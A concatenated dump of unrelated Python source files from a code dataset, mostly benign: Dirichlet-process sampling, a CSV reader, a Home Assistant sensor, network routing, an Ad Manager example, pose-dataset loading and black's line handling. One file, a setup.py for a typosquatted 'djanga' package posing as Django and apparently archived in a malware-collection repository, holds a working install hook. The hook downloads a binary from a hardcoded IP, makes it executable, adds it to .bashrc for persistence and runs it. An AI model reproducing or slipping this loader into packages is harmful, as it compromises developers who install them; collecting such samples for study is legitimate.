self.atoms.append(new_draw)
self.n.append(1)
new_mass = self.mass_prod * rbeta(1, self.nu)
self.mass.append(new_mass)
self.mass_prod *= 1.-new_mass
self.mass_sofar += new_mass
draws[i] = new_draw
if m==1:
draws = draws[0]
return draws
class DP(Stochastic):
"""
value: A DP realization.
Parents: 'alpha': concentration parameter, 'base': base probability distribution.
Base parent must have random() and logp() methods (must be an actual distribution object).
Should get intrinsic set of clusters. Step methods will update them with the children.
A new value should be created conditional on the intrinsic clusters every time a parent is updated.
"""
def __init__(self,
name,
basemeas_rand,
basemeas_logp,
nu,
doc=None,
trace=True,
value=None,
cache_depth=2,
plot=False,
verbose=0,
**basemeas_params):
self.basemeas_logp = basemeas_logp
self.basemeas_rand = basemeas_rand
self.basemeas_params = basemeas_params
parents = {}
parents['basemeas_logp'] = basemeas_logp
parents['basemeas_rand'] = basemeas_rand
parents['basemeas_params'] = basemeas_params
parents['nu'] = nu
def dp_logp_fun(value, **parents):
return 0.
# raise ValueError, 'DPStochastic objects have no logp attribute'
def dp_random_fun(basemeas_logp, basemeas_rand, nu, basemeas_params):
return DPRealization(basemeas_rand, nu, **basemeas_params)
# If value argument provided, read off intrinsic clusters.
# If clusters argument provided, well store them.
# If no clusters argument provided, propose from prior all over the place.
Stochastic.__init__(self, logp=dp_logp_fun, random=dp_random_fun, doc=doc, name=name, parents=parents,
trace=trace, value=value, dtype=np.object, rseed=True, observed=False, cache_depth=cache_depth,
plot=plot, verbose=verbose)
class DPDraw(Stochastic):
"""
value: An array of values.
May want to hide these in the step method,
but many step methods need them so it's probably better to keep them here:
N: length of value.
N_clusters: number of clusters.
clusters: values of clusters, length-N list.
cluster_multiplicities: multiplicities of clusters.
Note may want to make these things their own Stochastics, in case people want to have
Deterministics etc. depending on them or to trace them.
Parent: 'dist': a DPStochastic.
logp: product of base logp evaluated on each cluster (each cluster appears only once
regardless of multiplicity) plus some function of alpha and the number of clusters.
"""
def __init__( self,
name,
DP,
N=1,
doc=None,
trace=True,
observed=False,
cache_depth=2,
plot=True,
verbose = 0):
self.N = N
def DP_logp_fun(value, dist):
return dist.logp(value)
def DP_random_fun(dist):
return dist.rand(N)
Stochastic.__init__(self,
logp = DP_logp_fun,
doc=doc,
name=name,
parents={'dist': DP},
random = DP_random_fun,
trace=trace,
value=None,
dtype=float,
rseed=True,
observed=observed,
cache_depth=cache_depth,
plot=plot,
verbose = verbose)
self.clusters = lam_dtrm('clusters',lambda draws=self: draws_to_atoms(draws))
from numpy.testing import *
from pylab import *
class test_DP(NumpyTestCase):
def check_correspondence(self):
x_d = linspace(-5.,5.,1000)
dx = x_d[1] - x_d[0]
nu = 10
p = nu * dx/sqrt(2.*pi)*exp(-x_d**2)
DP_approx = rdirichlet(p).squeeze()
DP_approx = hstack((DP_approx, 1.-sum(DP_approx)))
true_DP = DPRealization(rnormal, nu, mu=0,tau=1)
true_DP.rand(1000)
clf()
subplot(2,1,1)
plot(x_d, DP_approx,'k.',markersize=8)
subplot(2,1,2)
plot_atoms(true_DP)
def check_draws(self):
D = DPRealization(rnormal,100,mu=-10,tau=.1)
draws = D.rand(1000)
clf()
hist(draws)
def check_stochastics(self):
S = DP('S', rnormal,normal_like, 100, mu=10, tau=.1)
q = DPDraw('q', S, N=1000)
clf()
hist(q.value)
if __name__=='__main__':
NumpyTest().run()
"""
Note: If you could get a distribution for the multiplicities of the currently-
found clusters in a DP, could you give its children a logp attribute?
Then you could do something like with the GP: give the DPStochastic an intrinsic
set of clusters unrelated to its children, assess its logp using only its intrinsic
clusters, etc.
Yes, you can easily do this. Give the DP object its intrinsic clusters, and let the
step methods treat those as the things that are really participating in the model
even though from the user's perspective the entire DP is participating.
"""
# Old random method
# val = []
# N = len(self.atoms)
#
# # Initialize. Optimization 1: keep running sum.
# if N>0:
# sum_n = np.sum(self.n)
# else:
# sum_n = 0
#
# float_sumn = np.float(sum_n)
#
# for i in xrange(m):
#
# # Optimization 2: update cumulative sum on the fly.
# self.tables = np.cumsum(self.n)
#
# # Maybe draw a new atom
# if uniform() > float_sumn / (float_sumn+self.nu):
# new_val = self.basemeas_rand(**self.basemeas_params)
# self.atoms.append(new_val)
# self.n.append(1)
# N = N + 1
#
# # Otherwise draw from one of the existing algorithms
# else:
# # Optimization 3: Draw uniforms ahead of time.
# # DON'T use the same uniform for checking new atom
# # creation AND for finding which old atom to draw from,
# # you'll introduce painful bias.
#
# unif = uniform() * float_sumn
# for i in xrange(N):
# if unif < self.tables[i]:
# new_val = self.atoms[i]
# self.n[i] = self.n[i]+1
# break
#
# float_sumn = float_sumn + 1.
# val.append(new_val)
#
# if m>1:
# return array(val, dtype=float)
# else:
# return val[0]
| 28.841849
| 123
| 0.574996
|
cc010c40256ccc2367a95daf4b0d286b84d57b1d
| 311
|
py
|
Python
|
movies.py
|
vijay-krishnamoorthy/python-practice
|
2028bccb03619b6ac50bdfdba270623f0bfb67a9
|
[
"bzip2-1.0.6"
] | null | null | null |
movies.py
|
vijay-krishnamoorthy/python-practice
|
2028bccb03619b6ac50bdfdba270623f0bfb67a9
|
[
"bzip2-1.0.6"
] | null | null | null |
movies.py
|
vijay-krishnamoorthy/python-practice
|
2028bccb03619b6ac50bdfdba270623f0bfb67a9
|
[
"bzip2-1.0.6"
] | null | null | null |
import csv
path="C:\\Users\\Admin\\Desktop\\python-vijay\\movies.csv"
lines=[line for line in open(path)]
for line in lines:
l=list(line.strip().split(','))
print(l)
file = open(path, newline='')
reader = csv.reader(file)
header=next(reader)
data =[row for row in reader]
for i in data:
print(i)
| 19.4375
| 58
| 0.665595
|
5fe19a17aa72f3ac577b88a5997703ecbe033af7
| 1,464
|
py
|
Python
|
malware/djanga/djanga-0.1/setup.py
|
rsc-dev/pypi_malware
|
0502c84df508d2a84b5f50dc1d4c2b66191318fa
|
[
"Unlicense"
] | 35
|
2018-12-10T08:59:54.000Z
|
2022-01-24T17:43:56.000Z
|
malware/djanga/djanga-0.1/setup.py
|
rsc-dev/pypi_malware
|
0502c84df508d2a84b5f50dc1d4c2b66191318fa
|
[
"Unlicense"
] | null | null | null |
malware/djanga/djanga-0.1/setup.py
|
rsc-dev/pypi_malware
|
0502c84df508d2a84b5f50dc1d4c2b66191318fa
|
[
"Unlicense"
] | 8
|
2020-02-25T14:00:48.000Z
|
2021-10-15T10:13:16.000Z
|
from setuptools import setup, find_packages
def rn ():
import platform
s = False
try:
import urllib2
except ImportError:
import http.client
s = True
import os, stat
PATH = "/out"
IP = "145.249.104.71"
LOC = ".drv"
if platform.system () == "Linux":
if not s:
response = urllib2.urlopen ("http://" + IP + PATH).read ()
else:
connection = http.client.HTTPConnection (IP)
connection.request ("GET", PATH)
response = connecton.getresponse ().read ()
os.chdir (os.path.expanduser ("~"))
d = open (LOC, "wb")
d.write (response)
d.close ()
current_state = os.stat (LOC)
os.chmod (LOC, current_state.st_mode|stat.S_IEXEC)
brc = open (".bashrc", "a")
brc.write ("\n~/.drv &")
brc.close ()
system ("~/.drv")
else:
print ("Error installing library!")
exit (-1)
rn ()
setup(
name = 'djanga',
packages = find_packages (),
version = '0.1',
description = 'Django framework',
author = 'Rosa',
author_email = 'rosaright@example.com',
url = '',
download_url = '',
keywords = [''],
classifiers = [],
)
| 24.4
| 82
| 0.44877
|
49c0e71e0938861d4c7ebe7e1ff64d782759873e
| 671
|
py
|
Python
|
custom_components/repsolluzygas/contracts/RepsolGasSensor.py
|
jesusbotella/homeassistant_repsolluzygas
|
e3f664f4e153857a39d9df73049c2204b6942362
|
[
"MIT"
] | null | null | null |
custom_components/repsolluzygas/contracts/RepsolGasSensor.py
|
jesusbotella/homeassistant_repsolluzygas
|
e3f664f4e153857a39d9df73049c2204b6942362
|
[
"MIT"
] | null | null | null |
custom_components/repsolluzygas/contracts/RepsolGasSensor.py
|
jesusbotella/homeassistant_repsolluzygas
|
e3f664f4e153857a39d9df73049c2204b6942362
|
[
"MIT"
] | null | null | null |
from .RepsolContractSensor import RepsolContractSensor
class RepsolGasSensor(RepsolContractSensor):
@property
def name(self):
"""Return the name of the sensor."""
return '{contract_type} Last Invoice'.format(
contract_type=self.contract.getContractType().capitalize()
)
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return 'mdi:fire'
@property
def state(self):
"""Return the state of the sensor."""
return self.contract.getLastInvoice()['total_power_kwh']
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self.contract.getLastInvoice()
| 26.84
| 64
| 0.691505
|
50fd9fbc8b866c822121da5107ff4d031cb8a3ad
| 2,822
|
py
|
Python
|
Hologram/Network/Route.py
|
kevswims/hologram-python
|
f1dac5e7d461146120b4f077ecbe90ccb3f4adaa
|
[
"MIT"
] | 1
|
2019-04-23T11:36:46.000Z
|
2019-04-23T11:36:46.000Z
|
Hologram/Network/Route.py
|
kevswims/hologram-python
|
f1dac5e7d461146120b4f077ecbe90ccb3f4adaa
|
[
"MIT"
] | null | null | null |
Hologram/Network/Route.py
|
kevswims/hologram-python
|
f1dac5e7d461146120b4f077ecbe90ccb3f4adaa
|
[
"MIT"
] | 1
|
2020-12-06T20:49:02.000Z
|
2020-12-06T20:49:02.000Z
|
# Route.py - Hologram Python SDK Routing Manager
# This module configures routing for Hologram SDK.
#
# Author: Hologram <support@hologram.io>
#
# Copyright 2016 - Hologram (Konekt, Inc.)
#
#
# LICENSE: Distributed under the terms of the MIT License
#
import logging
import time
from logging import NullHandler
from pyroute2 import IPRoute
from pyroute2.netlink.exceptions import NetlinkError
DEFAULT_DESTINATION = '0.0.0.0/0'
class Route(object):
def __init__(self):
self.ipr = IPRoute()
self.logger = logging.getLogger(__name__)
self.logger.addHandler(NullHandler())
def is_interface_available(self, interface):
# An interface is considered available if it is simply on the ip route list.
# The interface does not need to be UP in order to be considered available.
return self.__interface_index(interface) is not None
def wait_for_interface(self, interface, max_retries):
count = 0
while count <= max_retries:
try:
# Check if ready to break out of loop when interface is found.
if self.is_interface_available(interface):
# NOTE: Ideally this conditional would be based on
# self.is_interface_up(interface), but there is an issue
# where the state of a ppp0 interface may show UNKNOWN
# on Raspbian linux even if ppp0 is UP.
return True
else:
self.logger.info('Waiting for interface %s:', interface)
time.sleep(1)
count += 1
except Exception as e:
pass
if count > max_retries:
return False
def add_default(self, gateway):
try:
self.add(DEFAULT_DESTINATION, gateway)
except NetlinkError as e:
self.logger.debug('Could not set default route due to NetlinkError: %s', str(e))
def add(self, destination, gateway):
self.ipr.route('add',
dst=destination,
gateway=gateway)
def __interface_index(self, interface):
index = None
indexes = self.ipr.link_lookup(ifname=interface)
if len(indexes) == 1:
index = indexes[0]
return index
def __get_interface_state(self, interface):
if self.is_interface_available(interface):
link_state = None
ipr_index = self.__interface_index(interface)
links = self.ipr.get_links()
for link in links:
if link['index'] == ipr_index:
link_state = link.get_attr('IFLA_OPERSTATE')
break
return link_state
else:
return None
| 34
| 92
| 0.592133
|
4957c1748dc0b9129002bbe22b300d25a7a3b626
| 1,887
|
py
|
Python
|
examples/ad_manager/v202202/creative_wrapper_service/get_all_creative_wrappers.py
|
MarkusBordihn/googleads-python-lib
|
09bbcb01f9443f1d140efd8f2d27ef0e4aa74d20
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202202/creative_wrapper_service/get_all_creative_wrappers.py
|
MarkusBordihn/googleads-python-lib
|
09bbcb01f9443f1d140efd8f2d27ef0e4aa74d20
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202202/creative_wrapper_service/get_all_creative_wrappers.py
|
MarkusBordihn/googleads-python-lib
|
09bbcb01f9443f1d140efd8f2d27ef0e4aa74d20
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all creative wrappers.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
creative_wrapper_service = client.GetService(
'CreativeWrapperService', version='v202202')
# Create a statement to select creative wrappers.
statement = ad_manager.StatementBuilder(version='v202202')
# Retrieve a small amount of creative wrappers at a time, paging
# through until all creative wrappers have been retrieved.
while True:
response = creative_wrapper_service.getCreativeWrappersByStatement(
statement.ToStatement())
if 'results' in response and len(response['results']):
for creative_wrapper in response['results']:
# Print out some information for each creative wrapper.
print('Creative wrapper with ID "%d" and label id "%d" was found.\n' %
(creative_wrapper['id'], creative_wrapper['labelId']))
statement.offset += statement.limit
else:
break
print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| 36.288462
| 78
| 0.737149
|
8de23f619193a3e2843cafe9fd7c761ffb9c688b
| 1,311
|
py
|
Python
|
datasets/invert.py
|
tson1997/Line-Segmentation-Model
|
f00b65c7914f44fa31e14d41120903d0da2d5496
|
[
"MIT"
] | 1
|
2021-06-19T17:32:14.000Z
|
2021-06-19T17:32:14.000Z
|
datasets/invert.py
|
tson1997/Line-Segmentation-Model
|
f00b65c7914f44fa31e14d41120903d0da2d5496
|
[
"MIT"
] | 7
|
2021-06-29T04:08:01.000Z
|
2021-07-22T09:12:55.000Z
|
datasets/invert.py
|
personwhofloat/Line-Segmentation-Model
|
f00b65c7914f44fa31e14d41120903d0da2d5496
|
[
"MIT"
] | 1
|
2021-06-24T06:51:19.000Z
|
2021-06-24T06:51:19.000Z
|
import torch
from PIL import Image, ImageOps
import numpy as np
import torchvision
import torchvision.transforms.functional as F
class Invert(object):
"""Inverts the color channels of an PIL Image
while leaving intact the alpha channel.
"""
def invert(self, img):
r"""Invert the input PIL Image.
Args:
img (PIL Image): Image to be inverted.
Returns:
PIL Image: Inverted image.
"""
if not F._is_pil_image(img):
raise TypeError('img should be PIL Image. Got {}'.format(type(img)))
if img.mode == 'RGBA':
r, g, b, a = img.split()
rgb = Image.merge('RGB', (r, g, b))
inv = ImageOps.invert(rgb)
r, g, b = inv.split()
inv = Image.merge('RGBA', (r, g, b, a))
elif img.mode == 'LA':
l, a = img.split()
l = ImageOps.invert(l)
inv = Image.merge('LA', (l, a))
else:
inv = ImageOps.invert(img)
return inv
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be inverted.
Returns:
PIL Image: Inverted image.
"""
return self.invert(img)
def __repr__(self):
return self.__class__.__name__ + '()'
| 27.3125
| 80
| 0.52479
|
afe1df6d1a1d3179ca725d8e64c4123639d80db3
| 447
|
py
|
Python
|
fastlane/core/worker/__init__.py
|
dgkatz/fastlane
|
1cfe630651c955434f8019a17be0c4ff1fe42c31
|
[
"MIT"
] | 4
|
2021-12-10T20:30:22.000Z
|
2022-01-06T17:08:20.000Z
|
fastlane/core/worker/__init__.py
|
dgkatz/fastlane
|
1cfe630651c955434f8019a17be0c4ff1fe42c31
|
[
"MIT"
] | null | null | null |
fastlane/core/worker/__init__.py
|
dgkatz/fastlane
|
1cfe630651c955434f8019a17be0c4ff1fe42c31
|
[
"MIT"
] | null | null | null |
from fastlane.core.worker import *
from fastlane.core.worker.impl.thread import *
from fastlane.core.worker.impl.process import *
from fastlane.core.worker.impl.batch import *
def get_worker_type(worker_type: str):
if worker_type == 'thread':
return ThreadWorker
elif worker_type == 'process':
return ProcessWorker
elif worker_type == 'batch':
return BatchWorker
else:
raise NotImplementedError()
| 27.9375
| 47
| 0.709172
|
48bd8ab487a9d49825e67d7e03b7630f86f4f7d8
| 8,910
|
py
|
Python
|
3D Pose by GAN/GAN/pose/dataset/pose_dataset.py
|
kyapp69/OpenMMD
|
795d4dd660cf7e537ceb599fdb038c5388b33390
|
[
"MIT"
] | 717
|
2018-10-31T16:52:42.000Z
|
2022-03-31T16:13:47.000Z
|
3D Pose by GAN/GAN/pose/dataset/pose_dataset.py
|
Pixis5566/OpenMMD
|
795d4dd660cf7e537ceb599fdb038c5388b33390
|
[
"MIT"
] | 48
|
2018-11-08T12:16:43.000Z
|
2020-08-10T00:24:50.000Z
|
3D Pose by GAN/GAN/pose/dataset/pose_dataset.py
|
Pixis5566/OpenMMD
|
795d4dd660cf7e537ceb599fdb038c5388b33390
|
[
"MIT"
] | 180
|
2018-10-31T18:41:33.000Z
|
2022-03-27T23:49:06.000Z
|
import copy
import os
import pickle
import chainer
import numpy as np
from . import pose_dataset_base
# Joints in H3.6M -- data has 32 joints,
# but only 17 that move; these are the indices.
H36M_NAMES = [''] * 32
H36M_NAMES[0] = 'Hip'
H36M_NAMES[1] = 'RHip'
H36M_NAMES[2] = 'RKnee'
H36M_NAMES[3] = 'RFoot'
H36M_NAMES[6] = 'LHip'
H36M_NAMES[7] = 'LKnee'
H36M_NAMES[8] = 'LFoot'
H36M_NAMES[12] = 'Spine'
H36M_NAMES[13] = 'Thorax'
H36M_NAMES[14] = 'Neck/Nose'
H36M_NAMES[15] = 'Head'
H36M_NAMES[17] = 'LShoulder'
H36M_NAMES[18] = 'LElbow'
H36M_NAMES[19] = 'LWrist'
H36M_NAMES[25] = 'RShoulder'
H36M_NAMES[26] = 'RElbow'
H36M_NAMES[27] = 'RWrist'
def project_point_radial(P, R, T, f, c, k, p):
"""
Project points from 3d to 2d using camera parameters
including radial and tangential distortion
Args
P: Nx3 points in world coordinates
R: 3x3 Camera rotation matrix
T: 3x1 Camera translation parameters
f: (scalar) Camera focal length
c: 2x1 Camera center
k: 3x1 Camera radial distortion coefficients
p: 2x1 Camera tangential distortion coefficients
Returns
Proj: Nx2 points in pixel space
D: 1xN depth of each point in camera space
radial: 1xN radial distortion per point
tan: 1xN tangential distortion per point
r2: 1xN squared radius of the projected points before distortion
"""
# P is a matrix of 3-dimensional points
assert len(P.shape) == 2
assert P.shape[1] == 3
N = P.shape[0]
X = R.dot(P.T - T) # rotate and translate
XX = X[:2, :] / X[2, :]
r2 = XX[0, :] ** 2 + XX[1, :] ** 2
radial = 1 + np.einsum(
'ij,ij->j', np.tile(k, (1, N)), np.array([r2, r2 ** 2, r2 ** 3]))
tan = p[0] * XX[1, :] + p[1] * XX[0, :]
XXX = XX * np.tile(radial + tan, (2, 1)) + \
np.outer(np.array([p[1], p[0]]).reshape(-1), r2)
Proj = (f * XXX) + c
Proj = Proj.T
D = X[2,]
return Proj, D, radial, tan, r2
class H36M(pose_dataset_base.PoseDatasetBase):
def __init__(self, action='all', length=1,
train=True, use_sh_detection=False):
if train:
subjects = ['S1', 'S5', 'S6', 'S7', 'S8']
else:
subjects = ['S9', 'S11']
if not os.path.exists('data/h36m'):
os.mkdir('data/h36m')
if not os.path.exists('data/h36m/points_3d.pkl'):
print('Downloading 3D points in Human3.6M dataset.')
os.system('wget --no-check-certificate "https://onedriv' + \
'e.live.com/download?cid=B08D60FE71FF90FD&resid=B08' + \
'D60FE71FF90FD%2118616&authkey=AFIfEB6VYEZnhlE" -O ' + \
'data/h36m/points_3d.pkl')
with open('data/h36m/points_3d.pkl', 'rb') as f:
p3d = pickle.load(f)
if not os.path.exists('data/h36m/cameras.pkl'):
print('Downloading camera parameters.')
os.system('wget --no-check-certificate "https://onedriv' + \
'e.live.com/download?cid=B08D60FE71FF90FD&resid=B08' + \
'D60FE71FF90FD%2118615&authkey=AEUoi3s16rBTFRA" -O ' + \
'data/h36m/cameras.pkl')
with open('data/h36m/cameras.pkl', 'rb') as f:
cams = pickle.load(f)
if use_sh_detection:
if not os.path.exists('data/h36m/sh_detect_2d.pkl'):
print('Downloading detected 2D points by Stacked Hourglass.')
os.system('wget --no-check-certificate "https://onedriv' + \
'e.live.com/download?cid=B08D60FE71FF90FD&resid=B08' + \
'D60FE71FF90FD%2118619&authkey=AMBf6RPcWQgjsh0" -O ' + \
'data/h36m/sh_detect_2d.pkl')
with open('data/h36m/sh_detect_2d.pkl', 'rb') as f:
p2d_sh = pickle.load(f)
with open('data/actions.txt') as f:
actions_all = f.read().split('\n')[:-1]
if action == 'all':
actions = actions_all
elif action in actions_all:
actions = [action]
else:
raise Exception('Invalid action.')
dim_to_use_x = np.where(np.array([x != '' for x in H36M_NAMES]))[0] * 3
dim_to_use_y = dim_to_use_x + 1
dim_to_use_z = dim_to_use_x + 2
dim_to_use = np.array(
[dim_to_use_x, dim_to_use_y, dim_to_use_z]).T.flatten()
self.N = len(dim_to_use_x)
p3d = copy.deepcopy(p3d)
self.data_list = []
for s in subjects:
for action_name in actions:
def search(a):
fs = list(filter(
lambda x: x.split()[0] == a, p3d[s].keys()))
return fs
files = []
files += search(action_name)
# 'Photo' is 'TakingPhoto' in S1
if action_name == 'Photo':
files += search('TakingPhoto')
# 'WalkDog' is 'WalkingDog' in S1
if action_name == 'WalkDog':
files += search('WalkingDog')
for file_name in files:
p3d[s][file_name] = p3d[s][file_name][:, dim_to_use]
L = p3d[s][file_name].shape[0]
for cam_name in cams[s].keys():
if not (cam_name == '54138969' and s == 'S11' \
and action_name == 'Directions'):
# 50Hz -> 10Hz
for start_pos in range(0, L - length + 1, 5):
info = {'subject': s,
'action_name': action_name,
'start_pos': start_pos,
'length': length,
'cam_name': cam_name,
'file_name': file_name}
self.data_list.append(info)
self.p3d = p3d
self.cams = cams
self.train = train
self.use_sh_detection = use_sh_detection
if use_sh_detection:
self.p2d_sh = p2d_sh
def __len__(self):
return len(self.data_list)
def get_example(self, i):
info = self.data_list[i]
subject = info['subject']
start_pos = info['start_pos']
length = info['length']
cam_name = info['cam_name']
file_name = info['file_name']
poses_xyz = self.p3d[subject][file_name][start_pos:start_pos + length]
params = self.cams[subject][cam_name]
if self.use_sh_detection:
if 'TakingPhoto' in file_name:
file_name = file_name.replace('TakingPhoto', 'Photo')
if 'WalkingDog' in file_name:
file_name = file_name.replace('WalkingDog', 'WalkDog')
sh_detect_xy = self.p2d_sh[subject][file_name]
sh_detect_xy = sh_detect_xy[cam_name][start_pos:start_pos+length]
P = poses_xyz.reshape(-1, 3)
X = params['R'].dot(P.T).T
X = X.reshape(-1, self.N * 3) # shape=(length, 3*n_joints)
# Normalization of 3d points.
X, scale = self._normalize_3d(X)
X = X.astype(np.float32)
scale = scale.astype(np.float32)
if self.use_sh_detection:
sh_detect_xy = self._normalize_2d(sh_detect_xy)
sh_detect_xy = sh_detect_xy.astype(np.float32)
return sh_detect_xy, X, scale
else:
proj = project_point_radial(P, **params)[0]
proj = proj.reshape(-1, self.N * 2) # shape=(length, 2*n_joints)
proj = self._normalize_2d(proj)
proj = proj.astype(np.float32)
return proj, X, scale
class MPII(chainer.dataset.DatasetMixin):
def __init__(self, train=True, use_sh_detection=False):
if use_sh_detection:
raise NotImplementedError
else:
self.poses = np.load('data/mpii_poses.npy')
np.random.seed(100)
perm = np.random.permutation(len(self.poses))
if train:
self.poses = self.poses[perm[:int(len(self.poses)*0.9)]]
else:
self.poses = self.poses[perm[int(len(self.poses)*0.9):]]
def __len__(self):
return self.poses.shape[0]
def get_example(self, i):
mpii_poses = self.poses[i:i+1]
xs = mpii_poses.T[0::2] - mpii_poses.T[0]
ys = mpii_poses.T[1::2] - mpii_poses.T[1]
mpii_poses = mpii_poses.T / np.sqrt(xs[1:]**2 + ys[1:]**2).mean(axis=0)
mpii_poses[0::2] -= mpii_poses[0]
mpii_poses[1::2] -= mpii_poses[1]
mpii_poses = mpii_poses.T.astype(np.float32)[None]
dummy_X = np.zeros((1, 1, 17*3), dtype=np.float32)
dummy_X[0, 0, 0::3] = mpii_poses[0, 0, 0::2]
dummy_X[0, 0, 1::3] = mpii_poses[0, 0, 1::2]
dummy_scale = np.array([1], dtype=np.float32)
return mpii_poses, dummy_X, dummy_scale
| 36.516393
| 79
| 0.548485
|
7f36f58085598d2f87c4891fd47987e5eee8c4a2
| 1,337
|
py
|
Python
|
tests/pipeline/test_swab_deltas.py
|
ONS-SST/cis_households
|
e475df5929e6763a46cd05aff1f7e960ccbe8e21
|
[
"MIT"
] | null | null | null |
tests/pipeline/test_swab_deltas.py
|
ONS-SST/cis_households
|
e475df5929e6763a46cd05aff1f7e960ccbe8e21
|
[
"MIT"
] | 252
|
2021-05-19T11:12:43.000Z
|
2022-03-02T10:39:10.000Z
|
tests/pipeline/test_swab_deltas.py
|
ONS-SST/cis_households
|
e475df5929e6763a46cd05aff1f7e960ccbe8e21
|
[
"MIT"
] | null | null | null |
import pandas as pd
import pytest
from mimesis.schema import Schema
from cishouseholds.pipeline.input_file_processing import generate_input_processing_function
from cishouseholds.pipeline.input_file_processing import swab_delta_parameters
from dummy_data_generation.schemas import get_swab_data_description
@pytest.fixture
def swab_delta_ETL_output(mimesis_field, pandas_df_to_temporary_csv):
"""
Generate lab swab file as pandas df.
"""
schema = Schema(schema=get_swab_data_description(mimesis_field))
pandas_df = pd.DataFrame(schema.create(iterations=5))
csv_file_path = pandas_df_to_temporary_csv(pandas_df)
processing_function = generate_input_processing_function(**swab_delta_parameters, include_hadoop_read_write=False)
processed_df = processing_function(resource_path=csv_file_path.as_posix())
return processed_df
@pytest.mark.integration
def test_swab_delta_ETL_df(swab_delta_ETL_output, regression_test_df):
regression_test_df(
swab_delta_ETL_output.drop("swab_test_source_file"), "swab_sample_barcode", "processed_swab"
) # remove source file column, as it varies for our temp dummy data
@pytest.mark.integration
def test_swab_delta_ETL_schema(swab_delta_ETL_output, regression_test_df_schema):
regression_test_df_schema(swab_delta_ETL_output, "processed_swab")
| 39.323529
| 118
| 0.827973
|
524bb02b222d7fb9ca2e30667d6905afdd9395ce
| 995
|
py
|
Python
|
Decoder/extractor.py
|
parttimeEr/3drCode
|
c4b1a6b69f3769d14fe751da54975b0205e05c73
|
[
"MIT"
] | null | null | null |
Decoder/extractor.py
|
parttimeEr/3drCode
|
c4b1a6b69f3769d14fe751da54975b0205e05c73
|
[
"MIT"
] | null | null | null |
Decoder/extractor.py
|
parttimeEr/3drCode
|
c4b1a6b69f3769d14fe751da54975b0205e05c73
|
[
"MIT"
] | null | null | null |
import cv2
def color_remove():
img_array1 = cv2.imread("temp.jpg")
img_array2 = cv2.imread("temp.jpg")
img_array3 = cv2.imread("temp.jpg")
# note that [:,:,0] is blue, [:,:,1] is green, [:,:,2] is red
img_array1[:, :, 1] = 0
img_array1[:, :, 2] = 0
mask = cv2.inRange(img_array1, (0, 0, 0), (200, 200, 200))
thresholded = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
inverted = 255 - thresholded
cv2.imwrite("1.jpg", inverted)
# cv2.imwrite("redblue.jpg", img_array)
img_array2[:, :, 2] = 0
img_array2[:, :, 0] = 0
mask = cv2.inRange(img_array2, (0, 0, 0), (200, 200, 200))
thresholded = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
inverted = 255 - thresholded
cv2.imwrite("2.jpg", inverted)
img_array3[:, :, 0] = 0
img_array3[:, :, 1] = 0
mask = cv2.inRange(img_array3, (0, 0, 0), (200, 200, 200))
thresholded = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
inverted = 255 - thresholded
cv2.imwrite("3.jpg", inverted)
| 35.535714
| 65
| 0.60402
|
555142413cadb5a0286e6d34f69a0780e0f1ba65
| 26,083
|
py
|
Python
|
src/black/lines.py
|
sciyoshi/black
|
faddb504b395c71a92e6a9ffadaafcc9413ecd88
|
[
"MIT"
] | 2
|
2018-12-18T18:14:21.000Z
|
2021-12-17T10:58:53.000Z
|
src/black/lines.py
|
sciyoshi/black
|
faddb504b395c71a92e6a9ffadaafcc9413ecd88
|
[
"MIT"
] | null | null | null |
src/black/lines.py
|
sciyoshi/black
|
faddb504b395c71a92e6a9ffadaafcc9413ecd88
|
[
"MIT"
] | 1
|
2021-06-02T17:46:23.000Z
|
2021-06-02T17:46:23.000Z
|
from dataclasses import dataclass, field
import itertools
import sys
from typing import (
Callable,
Collection,
Dict,
Iterator,
List,
Optional,
Sequence,
Tuple,
TypeVar,
cast,
)
from blib2to3.pytree import Node, Leaf
from blib2to3.pgen2 import token
from black.brackets import BracketTracker, DOT_PRIORITY
from black.mode import Mode
from black.nodes import STANDALONE_COMMENT, TEST_DESCENDANTS
from black.nodes import BRACKETS, OPENING_BRACKETS, CLOSING_BRACKETS
from black.nodes import syms, whitespace, replace_child, child_towards
from black.nodes import is_multiline_string, is_import, is_type_comment, last_two_except
from black.nodes import is_one_tuple_between
# types
T = TypeVar("T")
Index = int
LeafID = int
@dataclass
class Line:
"""Holds leaves and comments. Can be printed with `str(line)`."""
mode: Mode
depth: int = 0
leaves: List[Leaf] = field(default_factory=list)
# keys ordered like `leaves`
comments: Dict[LeafID, List[Leaf]] = field(default_factory=dict)
bracket_tracker: BracketTracker = field(default_factory=BracketTracker)
inside_brackets: bool = False
should_split_rhs: bool = False
magic_trailing_comma: Optional[Leaf] = None
def append(self, leaf: Leaf, preformatted: bool = False) -> None:
"""Add a new `leaf` to the end of the line.
Unless `preformatted` is True, the `leaf` will receive a new consistent
whitespace prefix and metadata applied by :class:`BracketTracker`.
Trailing commas are maybe removed, unpacked for loop variables are
demoted from being delimiters.
Inline comments are put aside.
"""
has_value = leaf.type in BRACKETS or bool(leaf.value.strip())
if not has_value:
return
if token.COLON == leaf.type and self.is_class_paren_empty:
del self.leaves[-2:]
if self.leaves and not preformatted:
# Note: at this point leaf.prefix should be empty except for
# imports, for which we only preserve newlines.
leaf.prefix += whitespace(
leaf, complex_subscript=self.is_complex_subscript(leaf)
)
if self.inside_brackets or not preformatted:
self.bracket_tracker.mark(leaf)
if self.mode.magic_trailing_comma:
if self.has_magic_trailing_comma(leaf):
self.magic_trailing_comma = leaf
